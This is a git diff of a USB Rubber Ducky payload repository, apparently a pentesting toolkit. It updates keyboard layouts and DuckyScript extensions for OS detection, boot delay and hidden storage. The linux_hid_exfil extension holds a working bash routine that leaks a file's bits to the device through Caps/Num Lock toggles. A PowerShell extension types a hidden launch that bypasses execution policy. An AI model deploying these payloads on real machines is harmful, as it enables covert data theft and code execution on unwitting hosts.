diff --git a/languages/de.json b/languages/de.json index fe65926..90964e2 100644 --- a/languages/de.json +++ b/languages/de.json @@ -98,6 +98,7 @@ "DOWNARROW":"00,00,51", "UP":"00,00,52", "UPARROW":"00,00,52", + "NUMLOCK":"00,00,53", "<":"00,00,64", "APP":"00,00,65", "MENU":"00,00,65", diff --git a/languages/gb.json b/languages/gb.json index 2fd45d8..0dc0435 100644 --- a/languages/gb.json +++ b/languages/gb.json @@ -56,6 +56,7 @@ "ENTER":"00,00,28", "ESC":"00,00,29", "ESCAPE":"00,00,29", + "BACKSPACE":"00,00,2a", "TAB":"00,00,2b", " ":"00,00,2c", "SPACE":"00,00,2c", @@ -102,10 +103,26 @@ "DOWNARROW":"00,00,51", "UP":"00,00,52", "UPARROW":"00,00,52", + "NUMLOCK":"00,00,53", + "KPAD_SLASH":"00,00,54", + "KPAD_ASTERISK":"00,00,55", + "KPAD_MINUS":"00,00,56", + "KPAD_PLUS":"00,00,57", + "KPAD_ENTER":"00,00,58", + "KPAD_1":"00,00,59", + "KPAD_2":"00,00,5a", + "KPAD_3":"00,00,5b", + "KPAD_4":"00,00,5c", + "KPAD_5":"00,00,5d", + "KPAD_6":"00,00,5e", + "KPAD_7":"00,00,5f", + "KPAD_8":"00,00,60", + "KPAD_9":"00,00,61", + "KPAD_0":"00,00,62", + "KPAD_DOT":"00,00,63", "\\":"00,00,64", "APP":"00,00,65", "MENU":"00,00,65", - "ALT-TAB":"00,00,71", "CONTROL":"01,00,00", "CTRL":"01,00,00", "SHIFT":"02,00,00", @@ -137,6 +154,7 @@ "Z":"02,00,1d", "!":"02,00,1e", "\"":"02,00,1f", + "£":"02,00,20", "$":"02,00,21", "%":"02,00,22", "^":"02,00,23", @@ -151,19 +169,26 @@ "~":"02,00,31", ":":"02,00,33", "@":"02,00,34", + "¬":"02,00,35", "<":"02,00,36", ">":"02,00,37", "?":"02,00,38", "|":"02,00,64", "CTRL-SHIFT":"03,00,00", "ALT":"04,00,00", + "ALT-TAB":"04,00,2b", "CTRL-ALT":"05,00,00", "ALT-SHIFT":"06,00,00", - "COMMAND":"08,00,00", "GUI":"08,00,00", "WINDOWS":"08,00,00", - "COMMAND-OPTION":"12,00,00", - "COMMAND-CTRL-SHIFT":"12,00,00", - "COMMAND-CTRL":"12,00,00", - "COMMAND-OPTION-SHIFT'":"12,00,00" + "COMMAND":"08,00,00", + "COMMAND-CTRL":"09,00,00", + "COMMAND-CTRL-SHIFT":"0b,00,00", + "COMMAND-OPTION":"0c,00,00", + "COMMAND-OPTION-SHIFT'":"0e,00,00", + "ALTGR":"40,00,00", + "ALTGR-TAB":"40,00,2b", + "¦":"40,00,35", + "CTRL-ALTGR":"41,00,00", + "ALTGR-SHIFT":"42,00,00" } \ No newline at end of file diff --git a/payloads/extensions/community/Rolling_Powershell_Execution b/payloads/extensions/community/Rolling_Powershell_Execution index 38c29e4..e85281c 100644 --- a/payloads/extensions/community/Rolling_Powershell_Execution +++ b/payloads/extensions/community/Rolling_Powershell_Execution @@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution STRING powershell.exe -noP -nOnI -windo H END_IF - IF_DEFINED #EXECUTIONPOLICY + + IF_DEFINED_TRUE #EXECUTIONPOLICY SPACE IF (($RANDOM_PS % 2) == 0) THEN STRING -ep ByPasS diff --git a/payloads/extensions/detect_ready.txt b/payloads/extensions/detect_ready.txt index 201405a..83356d6 100644 --- a/payloads/extensions/detect_ready.txt +++ b/payloads/extensions/detect_ready.txt @@ -1,23 +1,26 @@ EXTENSION DETECT_READY - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM USAGE: - REM Extension runs inline (here) - REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic - REM boot delay + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay - REM TARGETS: - REM Any system that reflects CAPSLOCK will detect minimum required delay - REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM REM CONFIGURATION: - DEFINE RESPONSE_DELAY 25 - DEFINE ITERATION_LIMIT 120 + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 VAR $C = 0 - WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT)) + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) CAPSLOCK - DELAY RESPONSE_DELAY + DELAY #RESPONSE_DELAY $C = ($C + 1) END_WHILE CAPSLOCK diff --git a/payloads/extensions/exfil_auto_eof_detect.txt b/payloads/extensions/exfil_auto_eof_detect.txt index 2d7c5f5..ff1a28d 100644 --- a/payloads/extensions/exfil_auto_eof_detect.txt +++ b/payloads/extensions/exfil_auto_eof_detect.txt @@ -1,18 +1,24 @@ EXTENSION EXFIL_AUTO_EOF_DETECT - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM USAGE: - REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil + REM_BLOCK DOCUMENTATION + USAGE: + Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil - REM TARGETS: - REM Any; intended for use on systems that dont reflect more than 2 lock keys + TARGETS: + Requires reflection of at least 2 lock keys. + Intended for use on systems that dont reflect more than 2 lock keys. + END_REM + + REM CONFIGURATION + DEFINE #INACTIVTY_TARGET 10 FUNCTION WAIT_FOR_EOF() VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON VAR $PROCESSING = TRUE VAR $INACTIVITY_COUNT = 0 - DEFINE INACTIVTY_TARGET 10 WHILE ($PROCESSING) DELAY 20 IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN @@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT LED_R ELSE $INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1) - IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN + IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN $PROCESSING = FALSE END_IF LED_OFF diff --git a/payloads/extensions/hello_os.txt b/payloads/extensions/hello_os.txt index 8650c7f..a606539 100644 --- a/payloads/extensions/hello_os.txt +++ b/payloads/extensions/hello_os.txt @@ -1,13 +1,17 @@ EXTENSION HELLO_OS - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM USAGE: - REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS() - REM prints the OS determination + REM_BLOCK DOCUMENTATION + USAGE: + For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS() + prints the OS determination + END_REM REM Additional Example: Defining custom $_OS enums - DEFINE SOME_OTHER_OS 6 - DEFINE ANOTHER_OS 7 + DEFINE #EXTRA_EXAMPLES FALSE + DEFINE #SOME_OTHER_OS 6 + DEFINE #ANOTHER_OS 7 FUNCTION HELLO_OS() IF ($_OS == WINDOWS) THEN @@ -22,12 +26,14 @@ EXTENSION HELLO_OS STRING Hello ChromeOS! ELSE IF ($_OS == ANDROID) THEN STRING Hello Android! - ELSE IF($_OS == SOME_OTHER_OS) THEN - REM Example Only - STRING HELLO Custom OS Type! - ELSE IF($_OS == ANOTHER_OS) THEN - REM Example Only - STRING HELLO Another Custom OS Type! + IF_DEFINED_TRUE #EXTRA_EXAMPLES + ELSE IF($_OS == #SOME_OTHER_OS) THEN + REM Example Only + STRING HELLO Custom OS Type! + ELSE IF($_OS == #ANOTHER_OS) THEN + REM Example Only + STRING HELLO Another Custom OS Type! + END_IF_DEFINED ELSE STRING Hello World! END_IF diff --git a/payloads/extensions/linux_hid_exfil.txt b/payloads/extensions/linux_hid_exfil.txt index fe3a42b..8df8409 100644 --- a/payloads/extensions/linux_hid_exfil.txt +++ b/payloads/extensions/linux_hid_exfil.txt @@ -1,44 +1,94 @@ EXTENSION LINUX_HID_EXFIL - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION + REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT - REM Helpers for Linux Keystroke Reflection data exfiltration - REM This payload is a proof of concept for USB HID only Data Exfiltration + REM_BLOCK DOCUMENTATION + Helpers for Linux Keystroke Reflection data exfiltration + This payload is a proof of concept for USB HID only Data Exfiltration - REM TARGET: - REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool + TARGET: + Linux host that supports opening terminal via CTRL ALT t, and xdotool - REM USAGE: - REM Uncomment the function call below to run this extension inline - REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension + USAGE: + REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION + Prepare data to exfil (in filename defined by TARGET_FILE below) + with a terminal window already open - call RUN_LINUX_EXFIL() - REM DEPLOYMENT: - REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. + DEPLOYMENT: + Plug Ducky into host, wait for the LED to turn (and stay) solid Green. + END_REM REM CONFIGURATION: REM File on host machine to exfil using Keystroke Reflection attack - DEFINE TARGET_FILE t.txt - DEFINE TERMINAL_OPEN_DELAY 500 - DEFINE READY_TO_TYPE_DELAY 250 + DEFINE #TARGET_FILE filename.txt + + DEFINE #SAVE_AND_RESTORE_LOCKS TRUE + DEFINE #ENABLE_EXFIL_LEDS TRUE + DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE + + REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL() + DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE + FUNCTION RUN_LINUX_EXFIL() - LED_OFF - DELAY READY_TO_TYPE_DELAY - CTRL ALT t - DELAY TERMINAL_OPEN_DELAY - SAVE_HOST_KEYBOARD_LOCK_STATE + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_OFF + $_EXFIL_LEDS_ENABLED = TRUE + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + SAVE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED + $_EXFIL_MODE_ENABLED = TRUE - $_EXFIL_LEDS_ENABLED = TRUE - STRINGLN uname -a > TARGET_FILE - STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit + STRING_BASH + c="xdotool key --delay 4"; + bs=$(xxd -b + #TARGET_FILE + |cut -d" " -f2-7); + for((i=0;i<${#bs};i++));do + b="${bs:$i:1}"; + if [[ "$b" == "0" ]];then + c+=" Caps_Lock"; + fi; + if [[ "$b" == "1" ]];then + c+=" Num_Lock"; + fi; + done; + $c; + END_STRING + + IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL + STRING exit; + END_IF_DEFINED + + ENTER + + REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one WAIT_FOR_EOF() - $_EXFIL_LEDS_ENABLED = FALSE + $_EXFIL_MODE_ENABLED = FALSE - RESTORE_HOST_KEYBOARD_LOCK_STATE + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + $_EXFIL_LEDS_ENABLED = FALSE + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + RESTORE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED END_FUNCTION - REM Uncomment the function call below to run this extension inline (here) - REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension - - REM RUN_LINUX_EXFIL() + IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO + REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template. + REM DEMO Boot Delay + DELAY 3000 + REM Open Terminal + CTRL ALT t + DELAY 500 + REM Perpare some data in TARGET_FILE + STRINGLN uname -a>#TARGET_FILE + REM Exfil data to USB Rubber Ducky using Keystroke Reflection + RUN_LINUX_EXFIL() + END_IF_DEFINED END_EXTENSION diff --git a/payloads/extensions/os_detect.txt b/payloads/extensions/os_detect.txt index 77c9275..1df4013 100644 --- a/payloads/extensions/os_detect.txt +++ b/payloads/extensions/os_detect.txt @@ -1,202 +1,217 @@ EXTENSION OS_DETECTION - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM USB Rubber Ducky Host OS Detection - REM Generic OS detection at a high view is a moving target - REM results may vary greatly depending - REM on a combination of many variables: - REM - number of testing stages - REM - specific devices and versions tested against - REM - number of systems testing for (scope) - REM - detection techniques (passive/invisible/active/hybrid) - REM - overall speed - REM - overall accuracy + REM_BLOCK DOCUMENTATION + USB Rubber Ducky Host OS Detection + Generic OS detection at a high view is a moving target + results may vary greatly depending + on a combination of many variables: + - number of testing stages + - specific devices and versions tested against + - number of systems testing for (scope) + - detection techniques (passive/invisible/active/hybrid) + - overall speed + - overall accuracy - REM TARGET: - REM DEFAULT - Windows, Mac, Linux - REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android + If all you require is windows vs detection, the + PASSIVE_WINDOWS_DETECT extension is recommended over this extension. - REM USAGE: - REM Uncomment the function call below to run this extension inline (here) - REM or call DETECT_OS() anywhere in your payload after the extension - REM Place this extension and the DETECT_OS() before - REM you would like to first reference $_OS to execute payload code conditionally + TARGET: + DEFAULT - Windows, Mac, Linux + ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android + + USAGE: + Uncomment the function call below to run this extension inline (here) + or call DETECT_OS() anywhere in your payload after the extension + Place this extension and the DETECT_OS() before + you would like to first reference $_OS to execute payload code conditionally + + FEEDBACK: + As mentioned above, this a moving target (especially for mac systems) + Please report any issues identifying specific operating systems. + Your feedback will greatly help solidify the robustness of this extension + + DEBUGGING: + SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output + END_REM REM CONFIGURATION: - DEFINE VERBOSE FALSE - DEFINE ADVANCED_DETECTION FALSE - DEFINE STARTUP_DELAY 1500 - DEFINE RESTART_WAIT 1000 - DEFINE CONNECT_WAIT 1000 - DEFINE OS_DETECT_MODE HID - DEFINE OS_DETECT_VID VID_05AC - DEFINE OS_DETECT_PID PID_021E - DEFINE WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE HOST_RESPONSE_TIMEOUT 1000 + REM For Debugging: + DEFINE #DEBUGGING_OUTPUT FALSE + DEFINE #ADVANCED_DETECTION FALSE + REM Timing fine tuning: + DEFINE #STARTUP_DELAY 1500 + DEFINE #RESTART_WAIT 1000 + DEFINE #CONNECT_WAIT 1000 + DEFINE #OS_DETECT_MODE HID + DEFINE #OS_DETECT_VID VID_05AC + DEFINE #OS_DETECT_PID PID_021E + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #HOST_RESPONSE_TIMEOUT 1000 FUNCTION DETECT_OS() $_HOST_CONFIGURATION_REQUEST_COUNT = 0 - ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID - DELAY STARTUP_DELAY + ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID + DELAY #STARTUP_DELAY SAVE_HOST_KEYBOARD_LOCK_STATE - IF VERBOSE THEN - IF ADVANCED_DETECTION THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT + IF_DEFINED_TRUE #ADVANCED_DETECTION STRING ADVANCED OS DETECT - ELSE + ELSE_DEFINED STRING OS DETECT - END_IF + END_IF_DEFINED ENTER STRING test caps - END_IF + END_IF_DEFINED IF ($_CAPSLOCK_ON == FALSE) THEN LED_R CAPSLOCK - DELAY HOST_RESPONSE_TIMEOUT + DELAY #HOST_RESPONSE_TIMEOUT END_IF LED_OFF - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING received led response - END_IF + END_IF_DEFINED LED_G - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN - IF VERBOSE THEN + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING prediction: Windows - END_IF + END_IF_DEFINED $_OS = WINDOWS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING prediction: Linux - END_IF + END_IF_DEFINED $_OS = LINUX END_IF ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no led response ENTER STRING prediciton: MacOS - END_IF + END_IF_DEFINED $_OS = MACOS END_IF - IF ADVANCED_DETECTION THEN + IF_DEFINED_TRUE #ADVANCED_DETECTION IF ( $_OS == LINUX ) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING soft reconnect - END_IF + END_IF_DEFINED ATTACKMODE OFF - DELAY RESTART_WAIT - ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID - DELAY CONNECT_WAIT - IF VERBOSE THEN + DELAY #RESTART_WAIT + ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID + DELAY #CONNECT_WAIT + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING reconnected - END_IF + END_IF_DEFINED IF ($_CAPSLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING caps led on ENTER STRING test numlock - END_IF + END_IF_DEFINED NUMLOCK - DELAY HOST_RESPONSE_TIMEOUT - IF VERBOSE THEN + DELAY #HOST_RESPONSE_TIMEOUT + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF ($_NUMLOCK_ON == FALSE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no numlock led ENTER STRING prediciton: ChromeOS - END_IF + END_IF_DEFINED $_OS = CHROMEOS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING numlock led on ENTER STRING testing scrolllock - END_IF + END_IF_DEFINED SCROLLLOCK - DELAY HOST_RESPONSE_TIMEOUT - IF VERBOSE THEN + DELAY #HOST_RESPONSE_TIMEOUT + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF ($_SCROLLLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING scrolllock led on ENTER STRING prediciton: Android - END_IF + END_IF_DEFINED $_OS = ANDROID ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no scrolllock reply ENTER STRING prediction: Linux - END_IF + END_IF_DEFINED $_OS = LINUX END_IF END_IF END_IF ELSE IF ($_OS == MACOS) THEN IF ($_CAPSLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING caps led on ENTER STRING prediction: iOS - END_IF + END_IF_DEFINED $_OS = IOS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no caps reply ENTER STRING prediction: MacOS - END_IF + END_IF_DEFINED $_OS = MACOS END_IF ELSE IF ($_OS == WINDOWS) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING Confident Windows Prediction - END_IF + END_IF_DEFINED $_OS = WINDOWS END_IF - END_IF + END_IF_DEFINED RESTORE_HOST_KEYBOARD_LOCK_STATE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING OS_DETECT complete ENTER - END_IF + END_IF_DEFINED END_FUNCTION REM Uncomment the function call below to run this extension inline (here) REM or call DETECT_OS() anywhere in your payload after the extension - REM DETECT_OS() END_EXTENSION diff --git a/payloads/extensions/passive_detect_ready.txt b/payloads/extensions/passive_detect_ready.txt index 1551c44..8577757 100644 --- a/payloads/extensions/passive_detect_ready.txt +++ b/payloads/extensions/passive_detect_ready.txt @@ -1,21 +1,24 @@ EXTENSION PASSIVE_DETECT_READY - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Passive Detect Ready - no injection dynamic boot delay - REM for hosts that reflect current OS lock key state on connect + REM_BLOCK DOCUMENTATION + Passive Detect Ready - no injection dynamic boot delay + for hosts that reflect current OS lock key state on connect - REM USAGE: - REM Extension runs inline (here) - REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic - REM boot delay + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + END_REM REM CONFIGURATION: - DEFINE MAX_WAIT 150 - DEFINE CHECK_INTERVAL 20 + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 - VAR $MAX_TRIES = MAX_WAIT + VAR $MAX_TRIES = #MAX_WAIT WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) - DELAY CHECK_INTERVAL + DELAY #CHECK_INTERVAL $MAX_TRIES = ($MAX_TRIES - 1) END_WHILE END_EXTENSION diff --git a/payloads/extensions/passive_windows_detect.txt b/payloads/extensions/passive_windows_detect.txt index 1edd416..80822c4 100644 --- a/payloads/extensions/passive_windows_detect.txt +++ b/payloads/extensions/passive_windows_detect.txt @@ -1,37 +1,42 @@ EXTENSION PASSIVE_WINDOWS_DETECT - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Windows fully passive OS Detection and passive Detect Ready - REM Includes its own passive detect ready. Does not require - REM additional extensions + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. - REM USAGE: - REM Extension runs inline (here) - REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic - REM boot delay - REM $_OS will be set to WINDOWS or NOT_WINDOWS + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM REM CONFIGURATION: - DEFINE MAX_WAIT 150 - DEFINE CHECK_INTERVAL 20 - DEFINE WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE NOT_WINDOWS 7 + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 - VAR $MAX_TRIES = MAX_WAIT + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) - DELAY CHECK_INTERVAL + DELAY #CHECK_INTERVAL $MAX_TRIES = ($MAX_TRIES - 1) END_WHILE - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN $_OS = WINDOWS - ELSE - $_OS = NOT_WINDOWS END_IF - REM EXAMPLE USAGE AFTER EXTENSION - REM IF ($_OS == WINDOWS) THEN - REM STRING HELLO WINDOWS! - REM ELSE - REM STRING HELLO WORLD! - REM END_IF + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM END_EXTENSION diff --git a/payloads/extensions/protected_storage_mode.txt b/payloads/extensions/protected_storage_mode.txt index 4659cf8..e33a6cf 100644 --- a/payloads/extensions/protected_storage_mode.txt +++ b/payloads/extensions/protected_storage_mode.txt @@ -1,38 +1,62 @@ EXTENSION PROTECTED_STORAGE_MODE - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Example hidden storage mode - REM Forces user to padlock style unlock storage mode by setting - REM the HOSTs lock keys and pressing the duck button to submit a - REM combination three times. - REM The wrong combination will immediately fail silently. - REM The correct combination will trigger ATTACKMODE STORAGE and LED_G + REM_BLOCK + Example hidden storage mode + Forces user to padlock style unlock storage mode by setting + the HOSTs lock keys and pressing the duck button to submit a + combination three times. + The wrong combination will immediately fail silently. + The correct combination will trigger ATTACKMODE STORAGE and LED_G - REM TARGET: - REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK + TARGET: + Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK - REM USAGE: - REM BUTTON_DEF - REM STORAGE_PASSWORD_CHECK() - REM END_BUTTON + USAGE: + BUTTON_DEF + STORAGE_PASSWORD_CHECK() + END_BUTTON + + CONFIGURATION: + Available combinations provided as DEFINEs below, + change within the STORAGE_PASSWORD_CHECK as desired + + Method of input submission can be changed using SUBMIT_FOR_CHECK + But will obviously convolute combination checks. + END_REM + + REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor) + DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + + DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + + DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + + DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS FUNCTION STORAGE_PASSWORD_CHECK() VAR $ACCEPED = FALSE LED_R - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM first combination ALL LOCKS OFF - IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ALL_LOCKS_OFF THEN STRING . - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM second combination ONLY CAPS ON - IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ONLY_CAPS_ON THEN STRING . - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM third combination ONLY NUM ON - IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ONLY_NUM_ON THEN $ACCEPTED = TRUE END_IF END_IF diff --git a/payloads/extensions/translate.txt b/payloads/extensions/translate.txt index 811b9ea..6fc4d8f 100644 --- a/payloads/extensions/translate.txt +++ b/payloads/extensions/translate.txt @@ -1,41 +1,52 @@ EXTENSION TRANSLATE - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM This extension acts as a library or collection of helper functions - REM to work with converting variables in your payloads. - REM WHY: - REM Of the many ways to get information about the state of your payload - REM is by injecting static strings effectively as debugging prints - REM However, given the non-static nature of payloads using variables in - REM DuckyScript 3.0 - the ability to decode variables during payload - REM execution and print (inject) representations of their current state - REM can often be a critically helpful development and debugging tool. + REM_BLOCK DOCUMENTATION + This extension acts as a library or collection of helper functions + to work with converting variables in your payloads. + WHY: + Of the many ways to get information about the state of your payload + is by injecting static strings effectively as debugging prints + However, given the non-static nature of payloads using variables in + DuckyScript 3.0 - the ability to decode variables during payload + execution and print (inject) representations of their current state + can often be a critically helpful development and debugging tool. - REM Available Functions: - REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call - REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call - REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call - REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call + Available Functions: + DEFAULT: + TRANSLATE_INT() - var to decimal string - set $INPUT prior to call + EXTENDED: (enabled using the #INCLUDE defines below): + TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call + TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call + TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call - REM USAGE: - REM set $INPUT to desired var - REM call the correct translate_ function for the expected data type e.g. - REM VAR $myVar = 1234 - REM $INPUT = $myVar 